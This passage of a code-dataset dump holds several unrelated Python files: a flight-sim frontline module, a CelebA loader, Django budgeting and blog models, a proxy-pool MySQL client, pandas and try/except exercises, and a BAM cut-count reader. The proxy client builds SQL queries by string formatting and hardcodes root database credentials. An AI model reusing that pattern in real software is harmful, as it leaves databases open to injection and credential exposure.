18),\n \"night\": (0, 5),\n }\n\n\nclass SyriaTheater(ConflictTheater):\n terrain = syria.Syria()\n overview_image = \"syria.gif\"\n reference_points = (\n ReferencePoint(syria.Eyn_Shemer.position, Point(564, 1289)),\n ReferencePoint(syria.Tabqa.position, Point(1329, 491)),\n )\n landmap = load_landmap(\"resources\\\\syrialandmap.p\")\n daytime_map = {\n \"dawn\": (6, 8),\n \"day\": (8, 16),\n \"dusk\": (16, 18),\n \"night\": (0, 5),\n }\n\n\n@dataclass\nclass ComplexFrontLine:\n \"\"\"\n Stores data necessary for building a multi-segment frontline.\n \"points\" should be ordered from closest to farthest distance originating from start_cp.position\n \"\"\"\n\n start_cp: ControlPoint\n points: List[Point]\n\n\n@dataclass\nclass FrontLineSegment:\n \"\"\"\n Describes a line segment of a FrontLine\n \"\"\"\n\n point_a: Point\n point_b: Point\n\n @property\n def attack_heading(self) -> Numeric:\n \"\"\"The heading of the frontline segment from player to enemy control point\"\"\"\n return self.point_a.heading_between_point(self.point_b)\n\n @property\n def attack_distance(self) -> Numeric:\n \"\"\"Length of the segment\"\"\"\n return self.point_a.distance_to_point(self.point_b)\n\n\nclass FrontLine(MissionTarget):\n \"\"\"Defines a front line location between two control points.\n Front lines are the area where ground combat happens.\n Overwrites the entirety of MissionTarget __init__ method to allow for\n dynamic position calculation.\n \"\"\"\n\n def __init__(\n self,\n control_point_a: ControlPoint,\n control_point_b: ControlPoint,\n theater: ConflictTheater\n ) -> None:\n self.control_point_a = control_point_a\n self.control_point_b = control_point_b\n self.segments: List[FrontLineSegment] = []\n self.theater = theater\n self._build_segments()\n self.name = f\"Front line {control_point_a}/{control_point_b}\"\n\n def is_friendly(self, to_player: bool) -> bool:\n \"\"\"Returns True if the objective is in friendly territory.\"\"\"\n return False\n\n def mission_types(self, for_player: bool) -> Iterator[FlightType]:\n yield from [\n FlightType.CAS,\n # TODO: FlightType.TROOP_TRANSPORT\n # TODO: FlightType.EVAC\n ]\n yield from super().mission_types(for_player)\n\n @property\n def position(self):\n \"\"\"\n The position where the conflict should occur\n according to the current strength of each control point.\n \"\"\"\n return self.point_from_a(self._position_distance)\n\n @property\n def control_points(self) -> Tuple[ControlPoint, ControlPoint]:\n \"\"\"Returns a tuple of the two control points.\"\"\"\n return self.control_point_a, self.control_point_b\n\n @property\n def attack_distance(self):\n \"\"\"The total distance of all segments\"\"\"\n return sum(i.attack_distance for i in self.segments)\n\n @property\n def attack_heading(self):\n \"\"\"The heading of the active attack segment from player to enemy control point\"\"\"\n return self.active_segment.attack_heading\n\n @property\n def active_segment(self) -> FrontLineSegment:\n \"\"\"The FrontLine segment where there can be an active conflict\"\"\"\n if self._position_distance <= self.segments[0].attack_distance:\n return self.segments[0]\n\n remaining_dist = self._position_distance\n for segment in self.segments:\n if remaining_dist <= segment.attack_distance:\n return segment\n else:\n remaining_dist -= segment.attack_distance\n logging.error(\n \"Frontline attack distance is greater than the sum of its segments\"\n )\n return self.segments[0]\n\n def point_from_a(self, distance: Numeric) -> Point:\n \"\"\"\n Returns a point {distance} away from control_point_a along the frontline segments.\n \"\"\"\n if distance < self.segments[0].attack_distance:\n return self.control_point_a.position.point_from_heading(\n self.segments[0].attack_heading, distance\n )\n remaining_dist = distance\n for segment in self.segments:\n if remaining_dist < segment.attack_distance:\n return segment.point_a.point_from_heading(\n segment.attack_heading, remaining_dist\n )\n else:\n remaining_dist -= segment.attack_distance\n\n @property\n def _position_distance(self) -> float:\n \"\"\"\n The distance from point \"a\" where the conflict should occur\n according to the current strength of each control point\n \"\"\"\n total_strength = (\n self.control_point_a.base.strength + self.control_point_b.base.strength\n )\n if self.control_point_a.base.strength == 0:\n return self._adjust_for_min_dist(0)\n if self.control_point_b.base.strength == 0:\n return self._adjust_for_min_dist(self.attack_distance)\n strength_pct = self.control_point_a.base.strength / total_strength\n return self._adjust_for_min_dist(strength_pct * self.attack_distance)\n\n def _adjust_for_min_dist(self, distance: Numeric) -> Numeric:\n \"\"\"\n Ensures the frontline conflict is never located within the minimum distance\n constant of either end control point.\n \"\"\"\n if (distance > self.attack_distance / 2) and (\n distance + FRONTLINE_MIN_CP_DISTANCE > self.attack_distance\n ):\n distance = self.attack_distance - FRONTLINE_MIN_CP_DISTANCE\n elif (distance < self.attack_distance / 2) and (\n distance < FRONTLINE_MIN_CP_DISTANCE\n ):\n distance = FRONTLINE_MIN_CP_DISTANCE\n return distance\n\n def _build_segments(self) -> None:\n \"\"\"Create line segments for the frontline\"\"\"\n control_point_ids = \"|\".join(\n [str(self.control_point_a.id), str(self.control_point_b.id)]\n ) # from_cp.id|to_cp.id\n reversed_cp_ids = \"|\".join(\n [str(self.control_point_b.id), str(self.control_point_a.id)]\n )\n complex_frontlines = self.theater.frontline_data\n if (complex_frontlines) and (\n (control_point_ids in complex_frontlines)\n or (reversed_cp_ids in complex_frontlines)\n ):\n # The frontline segments must be stored in the correct order for the distance algorithms to work.\n # The points in the frontline are ordered from the id before the | to the id after.\n # First, check if control point id pair matches in order, and create segments if a match is found.\n if control_point_ids in complex_frontlines:\n point_pairs = pairwise(complex_frontlines[control_point_ids].points)\n for i in point_pairs:\n self.segments.append(FrontLineSegment(i[0], i[1]))\n # Check the reverse order and build in reverse if found.\n elif reversed_cp_ids in complex_frontlines:\n point_pairs = pairwise(\n reversed(complex_frontlines[reversed_cp_ids].points)\n )\n for i in point_pairs:\n self.segments.append(FrontLineSegment(i[0], i[1]))\n # If no complex frontline has been configured, fall back to the old straight line method.\n else:\n self.segments.append(\n FrontLineSegment(\n self.control_point_a.position, self.control_point_b.position\n )\n )\n\n\n @staticmethod\n def load_json_frontlines(\n theater: ConflictTheater\n ) -> Optional[Dict[str, ComplexFrontLine]]:\n \"\"\"Load complex frontlines from json\"\"\"\n try:\n path = Path(f\"resources/frontlines/{theater.terrain.name.lower()}.json\")\n with open(path, \"r\") as file:\n logging.debug(f\"Loading frontline from {path}...\")\n data = json.load(file)\n return {\n frontline: ComplexFrontLine(\n data[frontline][\"start_cp\"],\n [Point(i[0], i[1]) for i in data[frontline][\"points\"]],\n )\n for frontline in data\n }\n except OSError:\n logging.warning(\n f\"Unable to load preset frontlines for {theater.terrain.name}\"\n )\n return None\n","sub_path":"game/theater/conflicttheater.py","file_name":"conflicttheater.py","file_ext":"py","file_size_in_byte":33952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"12268011","text":"import numpy as np\nimport scipy.misc\nimport time\nimport os\n\ndef make_generator(path, image_list, batch_size):\n epoch_count = [1]\n\n def get_epoch():\n images = np.zeros((batch_size, 3, 64, 64), dtype='int32')\n random_state = np.random.RandomState(epoch_count[0])\n random_state.shuffle(image_list)\n epoch_count[0] += 1\n for n, image_name in enumerate(image_list):\n image = scipy.misc.imread(os.path.join(path, image_name))\n image = image[50:50+128, 25:25+128, :]\n image = scipy.misc.imresize(image, (64, 64))\n images[n % batch_size] = image.transpose(2, 0, 1)\n if n > 0 and n % batch_size == 0:\n yield (images,)\n return get_epoch\n\n\ndef get_train_validation_lists(data_dir):\n train_image_list = []\n val_image_list = []\n with open(os.path.join(data_dir, 'list_eval_partition.txt')) as f:\n for line in f:\n if int(line.split(' ')[1]) == 0:\n train_image_list.append(line.split(' ')[0])\n else:\n val_image_list.append(line.split(' ')[0])\n return train_image_list, val_image_list\n\n\ndef load(batch_size, data_dir='/home/ishaan/data/imagenet64'):\n train_list, val_list = get_train_validation_lists(data_dir)\n image_dir = os.path.join(data_dir, 'img_align_celeba')\n return (\n make_generator(image_dir, train_list, batch_size),\n make_generator(image_dir, val_list, batch_size)\n )\n\nif __name__ == '__main__':\n train_gen, valid_gen = load(64, data_dir='/cs/labs/yweiss/eitanrich/Datasets/CelebA/')\n t0 = time.time()\n for i, batch in enumerate(train_gen(), start=1):\n print(\"{}\\t{}\".format(str(time.time() - t0), batch[0][0,0,0,0]))\n if i == 1000:\n break\n t0 = time.time()\n","sub_path":"tflib/cropped_celeba.py","file_name":"cropped_celeba.py","file_ext":"py","file_size_in_byte":1807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"238044256","text":"from django.db import models\nfrom django.db.models import Sum\n\nfrom simple_history.models import HistoricalRecords\n\nfrom movimentacao.models import ( Sistema,\n Favorecido,\n Conta,\n Movimento,\n Categoria,\n SubCategoria )\n\nfrom agendamento.models import ( Agenda,\n AgendaProg,\n AgendaValor )\n\nfrom movimentacao.functions import *\n\nclass Poupanca(models.Model):\n class Meta:\n verbose_name_plural = 'Poupanças'\n indexes = [\n models.Index(fields=['sistema', 'descricao']),\n models.Index(fields=['sistema', 'favorecido']),\n ]\n\n sistema = models.ForeignKey(Sistema, on_delete=models.CASCADE)\n favorecido = models.ForeignKey(Favorecido, on_delete=models.PROTECT)\n lembrete = models.ForeignKey(Agenda, on_delete=models.PROTECT, null=True)\n\n descricao = models.CharField('Descrição', max_length=60)\n \n history = HistoricalRecords()\n\n def save(self, *args, **kwargs):\n\n old_self = Poupanca.objects.filter(id=self.id).first()\n\n if hasattr(self, 'agendar') and hasattr(self, 'dados_ag') and self.agendar and not old_self:\n conta = Conta.objects.filter(id=self.dados_ag.split('|')[0]).first()\n ag = Agenda()\n ag.sistema = self.sistema\n ag.conta = conta\n ag.tipo = Movimento.TRANSFERENCIA\n ag.favorecido = self.favorecido\n ag.conta_transf = None\n ag.data_inicio = hoje()\n ag.data_fim = end_of_days\n ag.data_ultimo_pagto = hoje()\n ag.save()\n self.lembrete = ag\n p = AgendaProg()\n p.sistema = self.sistema\n p.agenda = ag\n p.tipo = AgendaProg.MENSAL\n p.valor = self.dados_ag.split('|')[1]\n p.save()\n p = AgendaProg()\n p.sistema = self.sistema\n p.agenda = ag\n p.tipo = AgendaProg.ADD_DIAS_UTEIS\n p.save()\n p = AgendaProg()\n p.sistema = self.sistema\n p.agenda = ag\n p.tipo = AgendaProg.ANUAL\n p.todos = True\n p.save()\n p = AgendaProg()\n p.sistema = self.sistema\n p.agenda = ag\n p.tipo = AgendaProg.DIA_NAO_UTIL\n p.valor = 1\n p.save()\n \n super(Poupanca, self).save(*args, **kwargs)\n\n def getValorData(self, data=hoje()):\n valor = 0\n for p_conta in PoupancaConta.objects.filter(sistema=self.sistema, poupanca=self).select_related('conta', 'conta__sistema', 'conta__moeda'):\n valor = valor + convMoeda(self.sistema, p_conta.conta.getSaldoData(data), p_conta.conta.moeda, self.sistema.moeda_sistema, data)\n return valor\n\n def getValorPrevistoData(self, data=hoje()):\n valor = 0\n p_ano_ini = PoupancaAno.objects.filter(sistema=self.sistema, poupanca=self).order_by('ano').first()\n data_ini = addDias(-1, formDate(p_ano_ini.ano, 1, 1))\n for p_conta in PoupancaConta.objects.filter(sistema=self.sistema, poupanca=self).select_related('conta', 'conta__sistema', 'conta__moeda'):\n ini_conta = convMoeda(self.sistema, p_conta.conta.getSaldoData(data_ini), p_conta.conta.moeda, self.sistema.moeda_sistema, data_ini)\n valor = valor + ini_conta\n for ano in range(p_ano_ini.ano, data.year + 1):\n p_ano = PoupancaAno.objects.filter(sistema=self.sistema, poupanca=self, ano=ano).first()\n if not p_ano:\n pass\n for mes in range(1, data.month + 1 if data.year == ano else 13):\n juro_mes = valor * (p_ano.perc_juros / 100)\n valor = valor + p_ano.valor_deposito + juro_mes\n p_mes = PoupancaAnoMes.objects.filter(sistema=self.sistema, poupanca_ano=p_ano, mes=mes).first()\n if p_mes:\n valor = valor + p_mes.valor_extra\n return valor\n\n def __str__(self):\n return self.descricao + ' [' + str(self.sistema) + ']'\n\nclass PoupancaConta(models.Model):\n class Meta:\n verbose_name_plural = 'Contas da Poupança'\n indexes = [\n models.Index(fields=['sistema', 'poupanca', 'conta']),\n ]\n\n sistema = models.ForeignKey(Sistema, on_delete=models.CASCADE)\n poupanca = models.ForeignKey(Poupanca, related_name='contas', on_delete=models.CASCADE)\n conta = models.ForeignKey(Conta, on_delete=models.PROTECT)\n \n principal = models.BooleanField('Principal', default=False)\n\n history = HistoricalRecords()\n\n def save(self, *args, **kwargs):\n\n old_self = PoupancaConta.objects.filter(id=self.id).first()\n \n super(PoupancaConta, self).save(*args, **kwargs)\n\n if self.principal and self.poupanca.lembrete and not self.poupanca.lembrete.conta_transf:\n self.poupanca.lembrete.conta_transf = self.conta\n self.poupanca.lembrete.save()\n \n def __str__(self):\n return self.poupanca.descricao + ' - ' + self.conta.descricao + ' [' + str(self.sistema) + ']'\n\nclass PoupancaAno(models.Model):\n class Meta:\n verbose_name_plural = 'Planejamento Anual da Poupança'\n indexes = [\n models.Index(fields=['sistema', 'poupanca', 'ano']),\n models.Index(fields=['sistema', 'ano']),\n ]\n\n sistema = models.ForeignKey(Sistema, on_delete=models.CASCADE)\n poupanca = models.ForeignKey(Poupanca, on_delete=models.CASCADE)\n\n ano = models.PositiveSmallIntegerField('Ano', default=0)\n valor_deposito = models.DecimalField('Valor Depósito', max_digits=10, decimal_places=2, default=0)\n perc_juros = models.DecimalField('% Juros', max_digits=5, decimal_places=2, default=0)\n\n history = HistoricalRecords()\n\n def save(self, *args, **kwargs):\n\n old_self = PoupancaAno.objects.filter(id=self.id).first()\n \n super(PoupancaAno, self).save(*args, **kwargs)\n\n if self.poupanca.lembrete:\n AgendaValor.objects.filter(sistema=self.sistema, agenda=self.poupanca.lembrete, valor=0).delete() \n valor = AgendaValor.objects.filter(sistema=self.sistema, agenda=self.poupanca.lembrete, data_inicio=formDate(self.ano, 1, 1)).first()\n if not valor:\n valor = AgendaValor()\n valor.sistema = self.sistema\n valor.agenda = self.poupanca.lembrete\n valor.data_inicio = formDate(self.ano, 1, 1)\n valor.data_fim = formDate(self.ano, 12, 31)\n valor.valor = -self.valor_deposito\n valor.save()\n \n def getValorTotal(self):\n soma = PoupancaAnoMes.objects.filter(sistema=self.sistema, poupanca_ano=self).aggregate(Sum('valor_extra'))['valor_extra__sum'] or 0\n return (self.valor_deposito * 12) + soma\n \n def __str__(self):\n return self.poupanca.descricao + ' - ' + str(self.ano) + ' [' + str(self.sistema) + ']'\n\nclass PoupancaAnoMes(models.Model):\n class Meta:\n verbose_name_plural = 'Valores Extras Mensais da Poupança'\n indexes = [\n models.Index(fields=['sistema', 'poupanca_ano', 'mes']),\n ]\n\n sistema = models.ForeignKey(Sistema, on_delete=models.CASCADE)\n poupanca_ano = models.ForeignKey(PoupancaAno, related_name='extras', on_delete=models.CASCADE)\n\n mes = models.PositiveSmallIntegerField('Mês', default=0)\n valor_extra = models.DecimalField('Valor Extra Mensal', max_digits=10, decimal_places=2, default=0)\n\n history = HistoricalRecords()\n \n def __str__(self):\n return self.poupanca_ano.poupanca.descricao + ' - ' + str(self.poupanca_ano.ano) + '/' + str(self.mes) + ' [' + str(self.sistema) + ']'\n\nclass Orcamento(models.Model):\n class Meta:\n verbose_name_plural = 'Orçamentos'\n indexes = [\n models.Index(fields=['sistema', 'ano']),\n ]\n\n sistema = models.ForeignKey(Sistema, on_delete=models.CASCADE)\n\n descricao = models.CharField('Descrição', max_length=60)\n ano = models.PositiveSmallIntegerField('Ano', default=0)\n\n history = HistoricalRecords()\n\n def getResumo(self, tipo):\n itens = OrcamentoItem.objects.filter(sistema=self.sistema, orcamento=self).select_related('sistema')\n return self.getResumo_aux(tipo, itens)\n\n def getResumo_aux(self, tipo, itens):\n soma = 0\n if tipo == 'Receita':\n for item in itens.filter(categoria__tipo=Categoria.RECEITA):\n soma += item.getValorTotal()\n outros = itens.filter(categoria=None, outros_rec=True).first()\n if outros:\n soma += outros.getValorTotal()\n elif tipo == 'Despesa':\n for item in itens.filter(categoria__tipo=Categoria.DESPESA):\n soma += item.getValorTotal()\n outros = itens.filter(categoria=None, conta=None, outros_rec=False).first()\n if outros:\n soma += outros.getValorTotal()\n elif tipo == 'Poupança':\n for item in itens.filter(conta__isnull=False):\n soma += item.getValorTotal()\n for econo_ano in PoupancaAno.objects.filter(sistema=self.sistema, ano=self.ano).select_related('sistema'):\n soma += econo_ano.getValorTotal()\n else:\n soma = self.getResumo_aux('Receita', itens) -\\\n self.getResumo_aux('Poupança', itens) -\\\n self.getResumo_aux('Despesa', itens)\n return soma\n \n def __str__(self):\n return self.descricao + ' [' + str(self.sistema) + ']'\n\nclass OrcamentoItem(models.Model):\n class Meta:\n verbose_name_plural = 'Itens do Orçamento'\n indexes = [\n models.Index(fields=['sistema', 'orcamento', 'categoria', 'subcategoria']),\n models.Index(fields=['sistema', 'orcamento', 'conta']),\n models.Index(fields=['sistema', 'orcamento', 'categoria', 'subcategoria', 'conta', 'outros_rec']),\n models.Index(fields=['sistema', 'orcamento', 'outros_rec']),\n ]\n\n sistema = models.ForeignKey(Sistema, on_delete=models.CASCADE)\n orcamento = models.ForeignKey(Orcamento, on_delete=models.CASCADE)\n categoria = models.ForeignKey(Categoria, on_delete=models.PROTECT, blank=True, null=True)\n subcategoria = models.ForeignKey(SubCategoria, on_delete=models.PROTECT, blank=True, null=True)\n conta = models.ForeignKey(Conta, on_delete=models.PROTECT, blank=True, null=True)\n\n valor_mensal = models.DecimalField('Valor Mensal', max_digits=10, decimal_places=2, default=0)\n outros_rec = models.BooleanField('Outros de Receita', default=False)\n\n history = HistoricalRecords()\n\n def getValorTotal(self):\n soma = OrcamentoItemMes.objects.filter(sistema=self.sistema, orc_item=self).aggregate(Sum('valor_extra'))['valor_extra__sum'] or 0\n return (self.valor_mensal * 12) + soma\n \n def __str__(self):\n desc = self.orcamento.descricao + ' - '\n if self.conta:\n desc = desc + self.conta.descricao\n else:\n if self.categoria:\n desc = desc + self.categoria.descricao + '/'\n if self.subcategoria:\n desc = desc + self.subcategoria.descricao\n else: \n desc = desc + 'GERAL'\n else: \n desc = desc + 'OUTRAS ' + ('RECEITAS' if self.outros_rec else 'DESPESAS')\n return desc + ' [' + str(self.sistema) + ']'\n\nclass OrcamentoItemMes(models.Model):\n class Meta:\n verbose_name_plural = 'Valores Extras Mensais do Item do Orçamento'\n indexes = [\n models.Index(fields=['sistema', 'orc_item', 'mes']),\n ]\n\n sistema = models.ForeignKey(Sistema, on_delete=models.CASCADE)\n orc_item = models.ForeignKey(OrcamentoItem, related_name='orc_extras', on_delete=models.CASCADE)\n\n mes = models.PositiveSmallIntegerField('Mês', default=0)\n valor_extra = models.DecimalField('Valor Extra Mensal', max_digits=10, decimal_places=2, default=0)\n\n history = HistoricalRecords()\n \n def __str__(self):\n return str(self.orc_item) + ' - ' + str(self.mes)\n\n\n","sub_path":"planejamento/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":12343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"269143312","text":"\"\"\"\r\n数据库功能\r\n\"\"\"\r\n\r\nimport pymysql\r\n\r\n# 输入 table 名,数据库默认为 db=proxy\r\nclass DbClient(object):\r\n def __init__(self, dbname):\r\n self.conn = pymysql.connect(\r\n host='localhost',\r\n user='root',\r\n password='123456',\r\n db=\"proxy\",\r\n charset='utf8')\r\n self.cursor = self.conn.cursor()\r\n self.name = dbname\r\n\r\n # 改名\r\n def change_table(self, name):\r\n self.name = name\r\n\r\n # 获取一个\r\n def get(self):\r\n try:\r\n sql = \"select proxy from {}\".format(str(self.name))\r\n print(sql)\r\n self.cursor.execute(sql)\r\n data = self.cursor.execute(sql)\r\n if data == 0:\r\n raise Exception(\"获取IP失败\")\r\n pass\r\n data = self.cursor.fetchone()\r\n self.cursor.execute(\"DELETE FROM {} WHERE (proxy='{}')\".format(self.name, str(data[0])))\r\n print(\"删除\" + data[0])\r\n return data[0]\r\n finally:\r\n # self.cursor.close()\r\n self.conn.commit()\r\n\r\n # 插入数据\r\n def put(self, proxy):\r\n try:\r\n # sql = \"insert into proxyip VALUES {}\".format(proxy)\r\n self.cursor.execute(\"insert into {} VALUES (NULL, '{}')\".format(self.name, str(proxy)))\r\n print(\"插入\" + proxy)\r\n finally:\r\n # self.cursor.close()\r\n self.conn.commit()\r\n\r\n def delete(self, proxy):\r\n try:\r\n self.cursor.execute(\"DELETE FROM {} WHERE (proxy='{}')\".format(self.name, str(proxy)))\r\n print(\"成功删除\" + proxy)\r\n finally:\r\n self.conn.commit()\r\n\r\n # 返回列表\r\n def get_all(self):\r\n try:\r\n print(\"************\")\r\n sql = \"select proxy from {}\".format(str(self.name))\r\n # self.cursor.execute(sql)\r\n data = self.cursor.execute(sql)\r\n if data == 0:\r\n data = self.cursor.fetchall()\r\n return [i[0] for i in data]\r\n finally:\r\n # self.cursor.close()\r\n self.conn.commit()\r\n\r\n # 删除表中全部数据\r\n def del_all(self, name):\r\n try:\r\n sql = \"DELETE FROM {}\".format(str(name))\r\n self.cursor.execute(sql)\r\n finally:\r\n self.conn.commit()\r\n\r\n def close_db(self):\r\n self.conn.close()\r\n print(\"关闭数据表 \" + self.name)\r\n\r\nif __name__ == '__main__':\r\n gg = DbClient(\"raw_proxy_queue\")\r\n b = \"9299.313.3.8338\"\r\n # print(gg.get())\r\n # gg.pop(\"134.249.182.98:7777\")\r\n gg.put(\"9299.313.3.8338\")\r\n gg.change_table(\"useful_proxy_queue\")\r\n gg.put(b)\r\n a = gg.get_all()\r\n print(a)\r\n # a = gg.get_all()\r\n # print(a)\r\n # print(b in a)\r\n\r\n gg.close_db()\r\n\r\n","sub_path":"proxyIpSpider/Dbclient.py","file_name":"Dbclient.py","file_ext":"py","file_size_in_byte":2834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"623582005","text":"import pandas as pd\r\n\r\nproducts = pd.DataFrame({ #建立dataframe\r\n \"分類\": [\"居家\", \"居家\", \"娛樂\", \"娛樂\", \"科技\", \"科技\"],\r\n \"商店\": [\"家樂福\", \"頂好\", \"家樂福\", \"全聯\", \"頂好\",\"家樂福\"],\r\n \"價格\":[11.42, 23.50, 19.99, 15.95, 55.75, 111.55],\r\n \"測試分數\": [4, 3, 5, 7, 5, 8]})\r\nprint(products)\r\n\"\"\"\r\ndf = products.groupby(['商店','分類']).sum()\r\ndf = df.pivot_table(index='商店')\r\nprint(df)\r\n\"\"\"\r\nproducts.to_html(\"Ch9_5_2_01.html\")\r\n# 呼叫 pivot_table() 方法\r\n# pivot_table() 是使用定義索引,欄位,資料來 重塑 dataframe\r\n#下面定義了 索引為'分類' 欄位為'商店' 資料為'價格'\r\npivot_products = products.pivot_table(index='分類',columns='商店',values='價格')\r\nprint(pivot_products)\r\npivot_products.to_html(\"Ch9_5_2_02.html\")","sub_path":"第九章 Pandas套件/Ch9_5_2.py","file_name":"Ch9_5_2.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"50621835","text":"\n\n# try:\n# \t# pass\n# \tf = open('abc.txt')\n# except Exception:\n# \tprint(\"sorry this file is not exit\")\n\n\ntry:\n\t# pass\n\tf = open('text.txt')\n\t# varas = variable_not_exist\nexcept FileNotFoundError:\n\tprint(\"sorry this file is not exit\")\nexcept Exception:\n\tprint(\"Sorry some this went wrong\")\n\nelse: \n\tprint(f.read())\n\tf.close()\nfinally:\n\t#always executes\n\tprint(\"Always goes up\")","sub_path":"Core-Python-Exercise/try_catch.py","file_name":"try_catch.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"401971719","text":"from django.db import models\nfrom django.forms.models import model_to_dict\nfrom django.utils import timezone\nfrom django.utils.text import slugify\n\n\nclass InitialFullCleanOnSaveModels(models.Model):\n def __init__(self, *args, **kwargs):\n super(InitialFullCleanOnSaveModels, self).__init__(*args, **kwargs)\n if not hasattr(self, \"_loaded_values\"):\n self._loaded_values = model_to_dict(self)\n\n def save(self, *args, **kwargs):\n self.full_clean()\n super(InitialFullCleanOnSaveModels, self).save(*args, **kwargs)\n self._loaded_values = model_to_dict(self)\n\n class Meta:\n abstract = True\n\n\nclass Article(InitialFullCleanOnSaveModels):\n DRAFT = 0\n PUBLISH = 1\n STATUS_CHOICES = (\n (DRAFT, \"draft\"),\n (PUBLISH, \"publish\")\n )\n\n title = models.CharField(\n max_length=100,\n unique=True,\n verbose_name=\"title\"\n )\n slug = models.SlugField(\n blank=True,\n default=\"\",\n editable=False,\n max_length=100,\n verbose_name=\"slug\"\n )\n content = models.TextField(\n verbose_name=\"content\"\n )\n status = models.PositiveSmallIntegerField(\n blank=True,\n choices=STATUS_CHOICES,\n default=DRAFT,\n verbose_name=\"status\"\n )\n published_on = models.DateTimeField(\n blank=True,\n editable=False,\n null=True,\n verbose_name=\"published on\"\n )\n modified_on = models.DateTimeField(\n auto_now=True,\n verbose_name=\"modified on\"\n )\n created_on = models.DateTimeField(\n auto_now_add=True,\n verbose_name=\"created on\"\n )\n\n class Meta:\n get_latest_by = 'published_on'\n ordering = ['-status', '-published_on']\n verbose_name = \"article\"\n verbose_name_plural = \"articles\"\n\n def clean(self, *args, **kwargs):\n self.slug = slugify(self.title)\n if self._state.adding:\n if self.status == self.PUBLISH:\n self.published_on = timezone.now()\n elif self.status == self.DRAFT:\n self.published_on = None\n else:\n if self.status == self.PUBLISH and (\n self._loaded_values['status'] != self.PUBLISH): # noqa\n self.published_on = timezone.now()\n elif self.status == self.DRAFT and (\n self._loaded_values['status'] != self.DRAFT): # noqa\n self.published_on = None\n","sub_path":"blog/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"584885254","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/footprint_tools/cutcounts.py\n# Compiled at: 2019-08-20 12:40:02\nimport pysam, numpy as np\nfrom collections import defaultdict\n\nclass ReadError(Exception):\n pass\n\n\nclass GenotypeError(Exception):\n pass\n\n\nclass bamfile(object):\n \"\"\"Class to access a BAM file (largely inspired/copied from Piper et al.)\"\"\"\n\n def __init__(self, filepath, min_qual=1, remove_dups=False, remove_qcfail=True, chunksize=1000, offset=(0, -1)):\n try:\n self.samfile = pysam.Samfile(filepath, 'rb')\n except:\n raise IOError('Cannot open BAM file: %s' % filepath)\n\n self.offset = offset\n self.CHUNK_SIZE = chunksize\n self.min_qual = min_qual\n self.remove_dups = remove_dups\n self.remove_qcfail = remove_qcfail\n\n def __validate_read(self, read):\n if self.remove_qcfail and read.is_qcfail:\n raise ReadError()\n if self.remove_dups and read.is_duplicate:\n raise ReadError()\n if read.mapping_quality < self.min_qual:\n raise ReadError()\n return read\n\n def __get_read_mate(self, read):\n fpos = self.samfile.tell()\n try:\n try:\n mate = self.samfile.mate(read)\n except ValueError:\n mate = None\n\n finally:\n self.samfile.seek(fpos)\n\n return mate\n\n def __read_pair_generator(self, chrom, start, end):\n read_dict = defaultdict(lambda : [None, None])\n for read in self.samfile.fetch(chrom, max(start - 10, 0), end + 10):\n try:\n self.__validate_read(read)\n if not read.is_paired:\n yield (\n read, None)\n else:\n if not read.is_proper_pair or read.is_secondary or read.is_supplementary:\n continue\n qname = read.query_name\n if qname not in read_dict:\n if read.is_read1:\n read_dict[qname][0] = read\n else:\n read_dict[qname][1] = read\n else:\n if read.is_read1:\n yield (\n read, read_dict[qname][1])\n else:\n yield (\n read_dict[qname][0], read)\n del read_dict[qname]\n except ReadError as e:\n continue\n\n return\n\n def __add_read(self, read, fw, rev):\n if read.is_reverse:\n a = int(read.reference_end) + self.offset[1]\n rev[a] = rev.get(a, 0.0) + 1.0\n else:\n a = int(read.reference_start) + self.offset[0]\n fw[a] = fw.get(a, 0.0) + 1.0\n\n def __lookup(self, chrom, start, end, flip=False):\n tmp_fw = {}\n tmp_rev = {}\n for read1, read2 in self.__read_pair_generator(chrom, max(start - 10, 0), end + 10):\n self.__add_read(read1, tmp_fw, tmp_rev)\n if read2:\n self.__add_read(read2, tmp_fw, tmp_rev)\n\n fw_cutarray = np.array([ tmp_fw.get(i, 0.0) for i in range(start, end) ])\n rev_cutarray = np.array([ tmp_rev.get(i, 0.0) for i in range(start, end) ])\n return {'+': rev_cutarray[::-1] if flip else fw_cutarray, \n '-': fw_cutarray[::-1] if flip else rev_cutarray}\n\n def __getitem__(self, interval):\n chrom = interval.chrom\n start = interval.start\n end = interval.end\n flip = True if interval.strand == '-' else False\n ret = self.__lookup(chrom, start, end, flip)\n return ret\n\n def __lookup_allelic(self, chrom, start, end, pos, ref, alt, flip=False):\n tmp_ref_fw = {}\n tmp_ref_rev = {}\n tmp_alt_fw = {}\n tmp_alt_rev = {}\n for read1, read2 in self.__read_pair_generator(chrom, max(start - 10, 0), end + 10):\n try:\n offset = pos - read1.reference_start\n s = read1.query_sequence[offset]\n mismatches = int(read1.get_tag('XM', with_value_type=False))\n if s == ref and mismatches <= 1:\n fw = tmp_ref_fw\n rev = tmp_ref_rev\n elif s == alt and mismatches <= 2:\n fw = tmp_alt_fw\n rev = tmp_alt_rev\n else:\n raise GenotypeError()\n self.__add_read(read1, fw, rev)\n if read2:\n self.__add_read(read2, fw, rev)\n continue\n except GenotypeError as e:\n continue\n except IndexError as e:\n pass\n\n if not read2:\n continue\n try:\n offset = pos - read2.reference_start\n s = read2.query_sequence[offset]\n mismatches = int(read2.get_tag('XM', with_value_type=False))\n if s == ref and mismatches <= 1:\n fw = tmp_ref_fw\n rev = tmp_ref_rev\n elif s == alt and mismatches <= 2:\n fw = tmp_alt_fw\n rev = tmp_alt_rev\n else:\n raise GenotypeError()\n self.__add_read(read1, fw, rev)\n self.__add_read(read2, fw, rev)\n continue\n except 